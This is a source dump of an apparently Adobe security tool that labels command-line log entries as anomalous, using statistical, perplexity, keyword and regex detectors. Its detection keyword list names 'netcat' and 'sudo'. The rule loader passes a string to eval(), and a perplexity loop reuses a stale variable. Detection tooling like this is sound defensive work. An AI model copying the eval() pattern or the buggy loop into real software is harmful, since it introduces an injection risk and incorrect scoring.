400 |         stdev_outlier_threshold = 2
401 |         if 'stdev_outlier_threshold' in self._model:
402 |             stdev_outlier_threshold = self._model['stdev_outlier_threshold']
403 | 
404 |         spike = 'none'
405 |         if 'spike' in self._model:
406 |             spike = self._model['spike']
407 | 
408 |         spike_inverse = False
409 |         if 'spike_inverse' in self._model:
410 |            spike_inverse = bool(self._model['spike_inverse'])
411 | 
412 |         spike_borderline_threshold = 10
413 |         if 'spike_borderline_threshold' in self._model:
414 |             spike_borderline_threshold = self._model['spike_borderline_threshold']
415 | 
416 |         spike_outlier_threshold = 20
417 |         if 'spike_outlier_threshold' in self._model:
418 |             spike_outlier_threshold = self._model['spike_outlier_threshold']
419 | 
420 |         try:
421 |             cur_value = float(input_object[self._model['field_name']])
422 |         except:
423 |             return ['{0}_BAD_VALUE'.format(field_name)]
424 |         group_by = self._model['group_by']
425 |         if group_by is None:
426 |             new_labels = self._get_labels(cur_value,
427 |                                           mean_val,
428 |                                           std_val,
429 |                                           stdev,
430 |                                           stdev_borderline_threshold,
431 |                                           stdev_outlier_threshold,
432 |                                           spike,
433 |                                           spike_inverse,
434 |                                           spike_borderline_threshold,
435 |                                           spike_outlier_threshold,
436 |                                           label_for_normal)
437 |             for label in new_labels:
438 |                 labels.append(label)
439 |             # distance = abs((cur_value) - mean_val)
440 |             # if label_for_normal and distance <= std_val:
441 |             #     labels.append(field_name + '_NORMAL')
442 |             # elif std_val < distance <= (2 * std_val):
443 |             #     labels.append(field_name + '_BORDERLINE')
444 |             # elif (2 * std_val) < distance:
445 |             #     labels.append(field_name + '_OUTLIER')
446 |         else:
447 |             key = self._get_group_by_value(input_object, group_by)
448 |             if key in mean_val:
449 |                 count = count_val[key]
450 |                 if count > 5:
451 |                     new_labels = self._get_labels(cur_value,
452 |                                                   mean_val[key],
453 |                                                   std_val[key],
454 |                                                   stdev,
455 |                                                   stdev_borderline_threshold,
456 |                                                   stdev_outlier_threshold,
457 |                                                   spike,
458 |                                                   spike_inverse,
459 |                                                   spike_borderline_threshold,
460 |                                                   spike_outlier_threshold,
461 |                                                   label_for_normal)
462 |                     for label in new_labels:
463 |                         labels.append(label)
464 | 
465 |                     # distance = abs((cur_value) - mean_val[key])
466 |                     #
467 |                     # if distance <= std_val[key]:
468 |                     #     labels.append(field_name + '_NORMAL')
469 |                     # elif std_val[key] < distance <= (2 * std_val[key]):
470 |                     #     labels.append(field_name + '_BORDERLINE')
471 |                     # elif (2 * std_val[key]) < distance:
472 |                     #     labels.append(field_name + '_OUTLIER')
473 |                 else:
474 |                     labels.append('RARE_KEY_FOR_{0}'.format(field_name))
475 |             else:
476 |                 labels.append('UNSEEN_KEY_FOR_{0}'.format(field_name))
477 | 
478 |         return labels
479 | 
480 |     @staticmethod
481 |     def from_pretrained(pretrained: str) -> LabelGenerator:
482 |         lg = NumericField()
483 |         lg._model = json.loads(pretrained)
484 |         return lg
485 | 
486 | 
487 | class TextField(LabelGenerator):
488 |     """
489 |     This type of LabelGenerator handles text fields. It builds a n-gram based language model and computes the
490 |     perplexity of newly observed data. It also holds statistics over the training data (mean and stdev).
491 |     (perplexity<=sigma NORMAL, sigma<preplexity<=2*sigma BORDERLINE,
492 |     2*perplexity<value OUTLIER)
493 |     """
494 | 
495 |     def __init__(self, field_name: str, lm_mode='char', ngram_range=(3, 5)):
496 |         """
497 |         Constructor
498 |         :param field_name: What field to look for
499 |         :param lm_mode: Type of LM to build: char or token
500 |         :param ngram_range: N-gram range to use for computation
501 |         """
502 |         self._field_name = field_name
503 |         self._lm_mode = lm_mode
504 |         self._ngram_range = ngram_range
505 |         self._model = {}
506 |         self._total_inf = 0
507 |         self._mean_perplex = 0
508 |         self._std_perplex = 0
509 |         self._accepted_unigrams = {}
510 | 
511 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
512 |         unigram2count = {}
513 |         for item in dataset:
514 |             text = item[self._field_name]
515 |             unigrams = self._get_ngrams(text, unigrams_only=True)
516 |             occ_number = 1
517 |             if count_column is not None:
518 |                 occ_number = item[count_column]
519 |             for unigram in unigrams:
520 |                 if unigram not in unigram2count:
521 |                     unigram2count[unigram] = occ_number
522 |                 else:
523 |                     unigram2count[unigram] += occ_number
524 |         for unigram in unigram2count:
525 |             if unigram2count[unigram] > 2:
526 |                 self._accepted_unigrams[unigram] = 1
527 | 
528 |         for item in dataset:
529 |             text = item[self._field_name]
530 |             ngrams = self._get_ngrams(text)
531 |             occ_number = 1
532 |             if count_column is not None:
533 |                 occ_number = item[count_column]
534 |             for ngram in ngrams:
535 |                 if len(ngram) == self._ngram_range[0]:
536 |                     self._total_inf += occ_number
537 |                 if ngram in self._model:
538 |                     self._model[ngram] += occ_number
539 |                 else:
540 |                     self._model[ngram] = occ_number
541 |         # for ngram in self._model:
542 |         #     self._model[ngram] =
543 |         ser_model = [self._field_name, self._lm_mode, self._ngram_range[0], self._ngram_range[1], self._mean_perplex,
544 |                      self._std_perplex, self._total_inf]
545 | 
546 |         all_perplex = np.zeros((len(dataset)), dtype=np.float)
547 |         for ii in range(len(dataset)):
548 |             text = item[self._field_name]
549 |             all_perplex[ii] = self._compute_perplexity(text)
550 | 
551 |         self._mean_perplex = np.mean(all_perplex)
552 |         self._std_perplex = np.std(all_perplex)
553 |         ser_model[4] = self._mean_perplex
554 |         ser_model[5] = self._std_perplex
555 |         ser_model.append(self._accepted_unigrams)
556 |         for item in self._model:
557 |             ser_model.append(item)
558 |             ser_model.append(self._model[item])
559 | 
560 |         return ser_model
561 | 
562 |     def _compute_perplexity(self, text):
563 |         total = 0
564 |         ngrams = self._get_ngrams(text)
565 | 
566 |         for ngram in ngrams:
567 |             if ngram in self._model:
568 |                 sup_count = math.log(self._model[ngram]) + 1
569 |                 total += 1 / sup_count
570 |                 # if ngram[:-1] in self._model:
571 |                 #     inf_count = self._model[ngram[:-1]]
572 |                 # else:
573 |                 #     inf_count = self._total_inf
574 |                 # total += math.log(sup_count / inf_count)
575 |             else:
576 |                 total += -math.log(1e-8)  # small prob for unseen events
577 |         return total / len(ngrams)
578 | 
579 |     def __call__(self, input_object: dict) -> [str]:
580 |         perplexity = self._compute_perplexity(input_object[self._field_name])
581 |         if perplexity - self._mean_perplex < 2 * self._std_perplex:
582 |             return [perplexity * 10]
583 |         elif perplexity - self._mean_perplex < 4 * self._std_perplex:
584 |             return ['{0}_HIGH_PERPLEXITY'.format(self._field_name.upper()), perplexity * 10]
585 |         else:
586 |             return ['{0}_EXTREEME_PERPLEXITY'.format(self._field_name.upper()), perplexity * 10]
587 | 
588 |     @staticmethod
589 |     def from_pretrained(pretrained: str) -> LabelGenerator:
590 |         json_obj = json.loads(pretrained)
591 |         field_name = json_obj[0]
592 |         lm_mode = json_obj[1]
593 |         ngram_range = (json_obj[2], json_obj[3])
594 |         new_instance = TextField(field_name, lm_mode, ngram_range)
595 |         new_instance._mean_perplex = json_obj[4]
596 |         new_instance._std_perplex = json_obj[5]
597 |         new_instance._total_inf = json_obj[6]
598 |         new_instance._accepted_unigrams = json_obj[7]
599 |         for ii in range((len(json_obj) - 8) // 2):
600 |             ngram = tuple(json_obj[ii * 2 + 8])
601 |             count = json_obj[ii * 2 + 8 + 1]
602 |             new_instance._model[ngram] = count
603 |         return new_instance
604 | 
605 |     def _get_ngrams(self, text, unigrams_only=False):
606 |         text = str(text)
607 |         use_chars = self._lm_mode == 'char'
608 |         toks = Tokenizer.tokenize(text, use_chars=use_chars)
609 |         if unigrams_only:
610 |             return toks
611 |         new_toks = []
612 |         for tok in toks:
613 |             if tok in self._accepted_unigrams:
614 |                 new_toks.append(tok)
615 |             else:
616 |                 new_toks.append('<UNK>')
617 |         toks = new_toks
618 | 
619 |         # prepend and append
620 |         c_append = self._ngram_range[0] - 1
621 |         start = ['<s>' for _ in range(c_append)]
622 |         stop = ['</s>' for _ in range(c_append)]
623 |         toks = start + toks + stop
624 |         ngrams = []
625 |         for ngram_order in range(self._ngram_range[0], self._ngram_range[1] + 1):
626 |             for ii in range(len(toks) - ngram_order):
627 |                 ngram = tuple(toks[ii:ii + ngram_order])
628 |                 ngrams.append(ngram)
629 |         return ngrams
630 | 
631 | 
632 | class MultinomialField(LabelGenerator):
633 |     def __init__(self, field_name: str = '', absolute_threshold: int = 10, relative_threshold: float = 0.1,
634 |                  group_by: str = None):
635 |         """
636 |         Constructor
637 |         :param field_name: What field to use
638 |         :param absolute_threshold: Minimum absolute value for occurrences to trigger alert for
639 |         :param relative_threshold: Minimum relative value for occurrences to trigger alert for
640 |         """
641 |         self._mfc = MultinomialFieldCombiner([field_name], absolute_threshold, relative_threshold, group_by=group_by)
642 | 
643 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
644 |         return self._mfc.build_model(dataset, count_column=count_column)
645 | 
646 |     def __call__(self, item: dict) -> [str]:
647 |         lbls = self._mfc(item)
648 |         lbls = [l.replace('_PAIR', '') for l in lbls]
649 |         return lbls
650 | 
651 |     @staticmethod
652 |     def from_pretrained(pretrained: str) -> LabelGenerator:
653 |         lg = MultinomialFieldCombiner()
654 |         lg._model = json.loads(pretrained)
655 |         mf = MultinomialField()
656 |         mf._mfc = lg
657 |         return mf
658 | 
659 | 
660 | class MultinomialFieldCombiner(LabelGenerator):
661 |     def __init__(self, field_names: [str] = [], absolute_threshold: int = 10, relative_threshold: float = 0.1,
662 |                  group_by: str = None):
663 |         """
664 |         Constructor
665 |         :param field_names: What fields to combine
666 |         :param absolute_threshold: Minimum absolute value for occurrences to trigger alert for
667 |         :param relative_threshold: Minimum relative value for occurrences to trigger alert for
668 |         """
669 |         self._model = {'pair2count': {},
670 |                        'pair2prob': {},
671 |                        'absolute_threshold': absolute_threshold,
672 |                        'relative_threshold': relative_threshold,
673 |                        'field_names': field_names,
674 |                        'group_by': group_by
675 |                        }
676 | 
677 |     def _get_group_by_value(self, item, group_by):
678 |         if isinstance(group_by, str):
679 |             return str(item[group_by])
680 |         else:
681 |             return "({0})".format(','.join([str(item[k]) for k in group_by]))
682 | 
683 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
684 |         pair2count = self._model['pair2count']  # this is used for incremental updates
685 |         group_by_field = self._model['group_by']
686 |         total = 0
687 |         for item in dataset:
688 |             if group_by_field is not None:
689 |                 gbv = self._get_group_by_value(item, group_by_field)  # str(item[group_by_field])
690 |                 if gbv not in self._model['pair2count']:
691 |                     self._model['pair2count'][gbv] = {'TOTAL': 0}
692 |                 pair2count = self._model['pair2count'][gbv]
693 |             combined = [str(item[field]) for field in self._model['field_names']]
694 |             combined = '(' + ','.join(combined) + ')'
695 |             occ_number = 1
696 |             if count_column is not None:
697 |                 occ_number = int(item[count_column])
698 |             total += occ_number
699 |             if group_by_field is not None:
700 |                 self._model['pair2count'][gbv]['TOTAL'] += occ_number
701 |             if combined not in pair2count:
702 |                 pair2count[combined] = occ_number
703 |             else:
704 |                 pair2count[combined] += occ_number
705 | 
706 |         pair2prob = {}
707 |         if group_by_field is None:
708 |             for key in pair2count:
709 |                 pair2prob[key] = pair2count[key] / total
710 |         else:
711 |             pair2count = self._model['pair2count']
712 |             for k1 in pair2count:
713 |                 pair2prob[k1] = {}
714 |                 total = int(pair2count[k1]['TOTAL'])
715 |                 for key in pair2count[k1]:
716 |                     pair2prob[k1][key] = pair2count[k1][key] / total
717 | 
718 |         self._model['pair2count'] = pair2count
719 |         self._model['pair2prob'] = pair2prob
720 | 
721 |         return self._model
722 | 
723 |     def __call__(self, item: dict) -> [str]:
724 |         fname = ('_'.join(self._model['field_names'])).upper() + '_PAIR'
725 |         gname = ''
726 |         if self._model['group_by'] is not None:
727 |             gby = self._model['group_by']
728 |             if not isinstance(self._model['group_by'], list):
729 |                 gby = [gby]
730 |             gname = '_BASED_ON_{0}'.format('_'.join([str(k).upper() for k in gby]))
731 |         combined = [str(item[field]) for field in self._model['field_names']]
732 |         combined = '(' + ','.join(combined) + ')'
733 | 
734 |         pair2prob = self._model['pair2prob']
735 |         pair2count = self._model['pair2count']
736 |         group_by = self._model['group_by']
737 |         if group_by is not None:
738 |             gbv = self._get_group_by_value(item, group_by)
739 |             if gbv not in pair2prob:
740 |                 return []
741 |             pair2prob = self._model['pair2prob'][gbv]
742 |             pair2count = self._model['pair2count'][gbv]
743 | 
744 |         if combined not in pair2prob:
745 |             return ['UNSEEN_{0}{1}'.format(fname, gname)]
746 |         else:
747 |             labels = []
748 | 
749 |             prob = pair2prob[combined]
750 |             cnt = pair2count[combined]
751 | 
752 |             if cnt < self._model['absolute_threshold']:
753 |                 labels.append('LOW_OBS_COUNT_FOR_{0}{1}'.format(fname, gname))
754 |             if prob < self._model['relative_threshold']:
755 |                 labels.append('LOW_OBS_PROB_FOR_{0}{1}'.format(fname, gname))
756 |         return labels
757 | 
758 |     @staticmethod
759 |     def from_pretrained(pretrained: str) -> LabelGenerator:
760 |         lg = MultinomialFieldCombiner()
761 |         lg._model = json.loads(pretrained)
762 |         return lg
763 | 
764 | 
765 | class NumericalFieldCombiner(LabelGenerator):
766 |     def __init__(self, field_names: [str], normalize=True):
767 |         """
768 | 
769 |         :param field_names: What fields to combine
770 |         :param normalize: Normalize each field using standard deviation before processing
771 |         """
772 |         self._field_names = field_names
773 |         self._normalize = normalize
774 | 
775 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
776 |         pass
777 | 
778 |     def __call__(self, input_object: dict) -> [str]:
779 |         pass
780 | 
781 |     @staticmethod
782 |     def from_pretrained(pretrained: str) -> LabelGenerator:
783 |         pass
784 | 
785 | 
786 | class KeywordBased(LabelGenerator):
787 |     def __init__(self, keyword_list: list, field_name: str):
788 |         if isinstance(keyword_list, str):
789 |             keyword_list = re.sub('[^0-9a-zA-Z]+', ' ', keyword_list)
790 |             keyword_list = keyword_list.split(' ')
791 |         self._label_list = [item for item in keyword_list]
792 |         self._field_name = field_name
793 | 
794 |     def __call__(self, input_object: dict):
795 |         label_list = []
796 |         text = str(input_object[self._field_name])
797 |         text = re.sub('[^0-9a-zA-Z]+', ' ', text)
798 |         word_list = text.split(' ')
799 |         for ii in range(len(self._label_list)):
800 |             if self._label_list[ii] in word_list:
801 |                 label_list.append("{0}_KEYWORD_{1}".format(self._field_name.upper(), self._label_list[ii].upper()))
802 |         return label_list
803 | 
804 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
805 |         return {'field_name': self._field_name,
806 |                 'keyword_list': self._label_list}
807 | 
808 |     @staticmethod
809 |     def from_pretrained(pretrained: str) -> object:
810 |         obj = json.loads(pretrained)
811 |         keyword_list = obj['keyword_list']
812 |         field_name = obj['field_name']
813 |         klg = KeywordBased(keyword_list, field_name)
814 |         return klg
815 | 
816 | 
817 | class KnowledgeBased(LabelGenerator):
818 |     def __init__(self, rules_and_labels_tuple_list: list, field_name: str):
819 |         if isinstance(rules_and_labels_tuple_list, str):
820 |             # we need to parse this
821 |             rules_and_labels_tuple_list = eval(rules_and_labels_tuple_list)
822 |         self._regex_list = [re.compile(item[0]) for item in rules_and_labels_tuple_list]
823 |         self._regex_list_str = [item[0] for item in rules_and_labels_tuple_list]
824 |         self._label_list = [item[1] for item in rules_and_labels_tuple_list]
825 |         self._field_name = field_name
826 | 
827 |     def __call__(self, input_object: dict) -> [str]:
828 |         label_list = []
829 |         text = str(input_object[self._field_name])
830 |         for ii in range(len(self._label_list)):
831 |             if self._regex_list[ii].search(text):
832 |                 label_list.append(self._label_list[ii])
833 |         return label_list
834 | 
835 |     def build_model(self, dataset: Datasource, count_column: str = None) -> dict:
836 |         return {
837 |             'field_name': self._field_name,
838 |             'label_list': self._label_list,
839 |             'regex_list': self._regex_list_str
840 |         }
841 | 
842 |     @staticmethod
843 |     def from_pretrained(pretrained: str) -> object:
844 |         obj = json.loads(pretrained)
845 |         label_list = obj['label_list']
846 |         regex_list = obj['regex_list']
847 |         field_name = obj['field_name']
848 |         reg_lab = [(regex, label) for regex, label in zip(regex_list, label_list)]
849 |         kblg = KnowledgeBased(reg_lab, field_name)
850 |         return kblg
851 | 
852 | 
853 | if __name__ == '__main__':
854 |     mfc = MultinomialFieldCombiner(['user', 'parent_process'], absolute_threshold=500, relative_threshold=0.005)
855 |     nfc = NumericField('count')
856 |     tf = TextField('command', lm_mode='token', ngram_range=(3, 5))
857 |     klg = KeywordBased(keyword_list=['bash', 'java', 'netcat', 'sudo', 'apache2'], field_name='command')
858 |     from osas.data.datasources import CSVDataSource
859 | 
860 |     dataset = CSVDataSource('corpus/test.csv')
861 |     print("Building model")
862 |     klg.build_model(dataset)
863 |     print("Done")
864 | 
865 |     #    rez = mfc.build_model(dataset)
866 |     for item in dataset[:20]:
867 |         print("\n\n")
868 |         print(item)
869 |         print("")
870 |         print(klg(item))
871 |         print("\n\n")
872 |         print("=" * 20)
873 | 


--------------------------------------------------------------------------------
/src/osas/core/utils.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Authors: Security Intelligence Team within the Security Coordination Center
 3 | #
 4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
 5 | #
 6 | # Licensed under the Apache License, Version 2.0 (the "License");
 7 | # you may not use this file except in compliance with the License.
 8 | # You may obtain a copy of the License at
 9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 | 
19 | class Tokenizer:
20 |     @staticmethod
21 |     def tokenize(text, use_chars=False):
22 |         if use_chars:
23 |             return [ch for ch in text]
24 |         else:
25 |             toks = []
26 |             tok = ''
27 |             for ch in text:
28 |                 if not ch.isalnum() or ch == ' ':
29 |                     tok = tok.strip()
30 |                     if len(tok) != 0:
31 |                         toks.append(tok)
32 |                         tok = ''
33 |                     if ch != ' ':
34 |                         toks.append(ch)
35 |                 else:
36 |                     tok += ch
37 |             if tok.strip() != '':
38 |                 toks.append(tok)
39 | 
40 |             return toks
41 | 


--------------------------------------------------------------------------------
/src/osas/etc/README.md:
--------------------------------------------------------------------------------
1 | # Main config folder
2 | 


--------------------------------------------------------------------------------
/src/osas/etc/ad_config.conf:
--------------------------------------------------------------------------------
 1 | [NumericField]
 2 | field_name=''
 3 | 
 4 | [TextField]
 5 | field_name=''
 6 | lm_mode='char'
 7 | ngram_range=(3, 5)
 8 | 
 9 | [MultinomialFieldCombiner]
10 | field_names=['user', 'parent_process']
11 | absolute_threshold=500
12 | relative_threshold=0.005
13 | 
14 | [NumericalFieldCombiner]
15 | field_names=[]
16 | normalize=True
17 | 


--------------------------------------------------------------------------------
/src/osas/etc/config.conf:
--------------------------------------------------------------------------------
1 | [CSVDataSource]
2 | filename=corpus/hubble_test_tags.csv
3 | 


--------------------------------------------------------------------------------
/src/osas/etc/data_config.conf:
--------------------------------------------------------------------------------
1 | [dataX]
2 | dataurl=dataurl.com/data.csv
3 | apikey=secetkey
4 | 


--------------------------------------------------------------------------------
/src/osas/etc/label_config.conf:
--------------------------------------------------------------------------------
 1 | [CSVDataSource]
 2 | filename = corpus/test.csv
 3 | 
 4 | [MultinomialFieldCombiner]
 5 | field_names = ['user', 'parent_process']
 6 | absolute_threshold = 500
 7 | relative_threshold = 0.005
 8 | 
 9 | [NumericField]
10 | field_name = 'count'
11 | 
12 | [TextField]
13 | field_name = 'command'
14 | lm_mode = 'token'
15 | ngram_range = (3, 5)
16 | 
17 | [KeywordLabelGenerator]
18 | keyword_list = ['bash', 'java', 'netcat', 'sudo', 'apache']
19 | field_name = 'command'
20 | 


--------------------------------------------------------------------------------
/src/osas/io_utils/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/src/osas/io_utils/__init__.py


--------------------------------------------------------------------------------
/src/osas/io_utils/config.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | import sys
 20 | import ast
 21 | from builtins import object, super
 22 | import collections
 23 | import configparser
 24 | import pandas as pd
 25 | from dataclasses import dataclass, field
 26 | 
 27 | 
 28 | @dataclass
 29 | class Config(object):
 30 |     '''Generic base class to load/save config'''
 31 | 
 32 |     def _eval_str(self, s):
 33 |         '''convert type to actual type'''
 34 |         try:
 35 |             return ast.literal_eval(s)
 36 |         except:
 37 |             return s
 38 | 
 39 |     def save(self, filename):
 40 |         """Save configuration to file."""
 41 |         self.__config__ = self.__class__.__name__
 42 |         sorted_dict = collections.OrderedDict(sorted(self.__dict__.items()))
 43 |         # sort dictionary
 44 |         config = configparser.ConfigParser()
 45 |         config.add_section(self.__config__)  # write header
 46 |         for k, v in sorted_dict.items():  # for python3 use .items()
 47 |             if not k.startswith("_"):  # write only non-private properties
 48 |                 if isinstance(v, float):  # if we are dealing with a float
 49 |                     str_v = str(v)
 50 |                     if "e" not in str_v and "." not in str_v:
 51 |                         # stopconfusion with an int by appending a ".0"
 52 |                         v = str_v + ".0"
 53 |                 v = str(v)
 54 |                 config.set(self.__config__, k, v)
 55 |         with fopen(filename, 'w') as cfgfile:
 56 |             config.write(cfgfile)
 57 | 
 58 |     def load(self, filename):
 59 |         '''Load configuration from file'''
 60 |         __config__ = self.__class__.__name__
 61 |         config = configparser.ConfigParser()
 62 |         config.read(filename)
 63 |         # check to see if the config file has the appropriate section
 64 |         if not config.has_section(__config__):
 65 |             sys.stderr.write("ERROR: File:{} is not a valid configuration file"
 66 |                              " for the selected task: Missing section:[{}]\n"
 67 |                              .format(filename, __config__))
 68 |             sys.exit(1)
 69 |         for k, v in config.items(__config__):
 70 |             self.__dict__[k] = self._eval_str(v)
 71 | 
 72 | 
 73 | # ****Beware****
 74 | # Don't save secrets as default config
 75 | # Use local config file (not git synced) to save secrets
 76 | 
 77 | 
 78 | # ML data dataclasses
 79 | @dataclass
 80 | class CSVDataSource(Config):
 81 |     filename: str = field(default='corpus/test.csv')
 82 | 
 83 | 
 84 | @dataclass
 85 | class CSVDataColumn(Config):
 86 |     data: pd.DataFrame = field(default=pd.DataFrame())
 87 | 
 88 | 
 89 | # Label Generator dataclasses
 90 | @dataclass
 91 | class ObfuscationField(Config):
 92 |     field_name: str = field(default='command')
 93 |     gpu: bool = field(default=False)
 94 | 
 95 | 
 96 | @dataclass
 97 | class NumericField(Config):
 98 |     field_name: str = field(default='count')
 99 |     group_by: str = field(default=None)
100 |     mode: str = field(default='stdev')
101 |     borderline_threshold: float = field(default=1)
102 |     outlier_threshold: float = field(default=2)
103 |     label_for_normal: bool = field(default=True)
104 | 
105 | 
106 | @dataclass
107 | class TextField(Config):
108 |     field_name: str = field(default='command')
109 |     lm_mode: str = field(default='char')
110 |     ngram_range: tuple = field(default=(3, 5))
111 | 
112 | 
113 | @dataclass
114 | class MultinomialField(Config):
115 |     field_name: str = field(default='user')
116 |     absolute_threshold: int = field(default=10)
117 |     relative_threshold: float = field(default=0.1)
118 |     group_by: str = field(default=None)
119 | 
120 | 
121 | @dataclass
122 | class LOLField(Config):
123 |     field_name: str = field(default='command')
124 |     platform: str = field(default='linux')
125 | 
126 | 
127 | @dataclass
128 | class NumericalFieldCombiner(Config):
129 |     field_names: list = field(default_factory=lambda: [])
130 |     normalize: bool = field(default=True)
131 | 
132 | 
133 | @dataclass
134 | class MultinomialFieldCombiner(Config):
135 |     field_names: list = field(default_factory=lambda: [])
136 |     absolute_threshold: float = field(default=500)
137 |     relative_threshold: float = field(default=0.005)
138 |     group_by: str = field(default=None)
139 | 
140 | 
141 | @dataclass
142 | class KeywordBased(Config):
143 |     keyword_list: list = field(default_factory=lambda: [])
144 |     field_name: str = field(default='count')
145 | 
146 | 
147 | @dataclass
148 | class KnowledgeBased(Config):
149 |     rules_and_labels_tuple_list: list = field(default_factory=lambda: [()])
150 |     field_name: str = field(default='')
151 | 
152 | # mfc = MultinomialFieldCombiner()
153 | # mfc.load('osas/etc/ad_config.conf')
154 | # print(vars(mfc))
155 | 


--------------------------------------------------------------------------------
/src/osas/io_utils/formatter.py:
--------------------------------------------------------------------------------
 1 | #
 2 | # Authors: Security Intelligence Team within the Security Coordination Center
 3 | #
 4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
 5 | #
 6 | # Licensed under the Apache License, Version 2.0 (the "License");
 7 | # you may not use this file except in compliance with the License.
 8 | # You may obtain a copy of the License at
 9 | #
10 | # http://www.apache.org/licenses/LICENSE-2.0
11 | #
12 | # Unless required by applicable law or agreed to in writing, software
13 | # distributed under the License is distributed on an "AS IS" BASIS,
14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
15 | # See the License for the specific language governing permissions and
16 | # limitations under the License.
17 | #
18 | 
19 | # object type conversion/formatting utility functions
20 | import ast
21 | import json
22 | import sys
23 | 
24 | 
25 | def eval_str(x):
26 |     try:
27 |         return ast.literal_eval(x)
28 |     except Exception as e:
29 |         fstr = 'osas/io_utils/formatter.py:eval_str()'
30 |         print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
31 | 
32 | 
33 | def dict_to_str(d):
34 |     try:
35 |         return json.dumps(d)
36 |     except Exception as e:
37 |         fstr = 'osas/io_utils/formatter.py:dict_to_str()'
38 |         print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
39 | 
40 | 
41 | def str_to_dict(s):
42 |     try:
43 |         return json.loads(s)
44 |     except Exception as e:
45 |         fstr = 'osas/io_utils/formatter.py:str_to_dict()'
46 |         print("[{}]Error--{}".format(fstr, e), file=sys.stderr)
47 | 


--------------------------------------------------------------------------------
/src/osas/main/README.md:
--------------------------------------------------------------------------------
1 | # Main execution folder
2 | 


--------------------------------------------------------------------------------
/src/osas/main/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/adobe/OSAS/46eded4bb2b60652fc59e59a17036fd38d494d4f/src/osas/main/__init__.py


--------------------------------------------------------------------------------
/src/osas/main/apply_rules.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2022 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | import optparse
 20 | import re
 21 | import sys
 22 | 
 23 | import tqdm
 24 | from elasticsearch import helpers, Elasticsearch
 25 | 
 26 | sys.path.append('')
 27 | 
 28 | from osas.data.datasources import CSVDataSource, Datasource
 29 | import yaml
 30 | import os
 31 | 
 32 | 
 33 | def is_numeric(obj):
 34 |     attrs = ['__add__', '__sub__', '__mul__', '__truediv__', '__pow__']
 35 |     return all(hasattr(obj, attr) for attr in attrs)
 36 | 
 37 | 
 38 | def _get_all_yaml_files(root: str):
 39 |     all_files = []
 40 |     for path, subdirs, files in os.walk(root):
 41 |         for name in files:
 42 |             if name.endswith('.yaml'):
 43 |                 all_files.append(os.path.join(path, name))
 44 |     return all_files
 45 | 
 46 | 
 47 | def _load_rules(rules_folder: str) -> dict:
 48 |     all_rule_files = _get_all_yaml_files(rules_folder)
 49 |     all_rules = []
 50 |     for file in all_rule_files:
 51 |         with open(file, 'r') as f:
 52 |             rules_pack = yaml.safe_load(f)
 53 |             if rules_pack is None:
 54 |                 continue
 55 |             if 'rule name' not in rules_pack:
 56 |                 sys.stdout.write('Invalid rule file {0}. Missing rule name\n'.format(file))
 57 |                 sys.exit(0)
 58 |             if 'rule label' not in rules_pack:
 59 |                 sys.stdout.write('Invalid rule file {0}. Missing rule label\n'.format(file))
 60 |                 sys.exit(0)
 61 |             if 'rule score' not in rules_pack:
 62 |                 sys.stdout.write('Invalid rule file {0}. Missing rule score\n'.format(file))
 63 |                 sys.exit(0)
 64 |             all_rules.append(rules_pack)
 65 |     return all_rules
 66 | 
 67 | 
 68 | def _apply_rules(datasource: Datasource, rules: dict):
 69 |     scores = datasource['score']
 70 |     labels = datasource['labels']
 71 |     index = 0
 72 |     regex_cache = {}
 73 |     for item in tqdm.tqdm(datasource):
 74 |         for rule in rules:
 75 |             rule_name = rule['rule name']
 76 |             rule_score = float(rule['rule score'])
 77 |             rule_label = rule['rule label']
 78 |             cases = rule['conditions']
 79 |             for case in cases:
 80 |                 valid = True
 81 |                 for attribute_name in cases[case]:
 82 |                     attribute_values = cases[case][attribute_name]
 83 |                     if not isinstance(attribute_values, list):
 84 |                         attribute_values = [attribute_values]
 85 |                     if attribute_name not in item:
 86 |                         sys.stdout.write('Your dataset does not contain "{0}"\n'.format(attribute_name))
 87 |                         sys.exit(0)
 88 |                     found = False
 89 |                     for attribute_value in attribute_values:
 90 |                         if attribute_value not in regex_cache:
 91 |                             regex_cache[attribute_value] = re.compile(attribute_value)
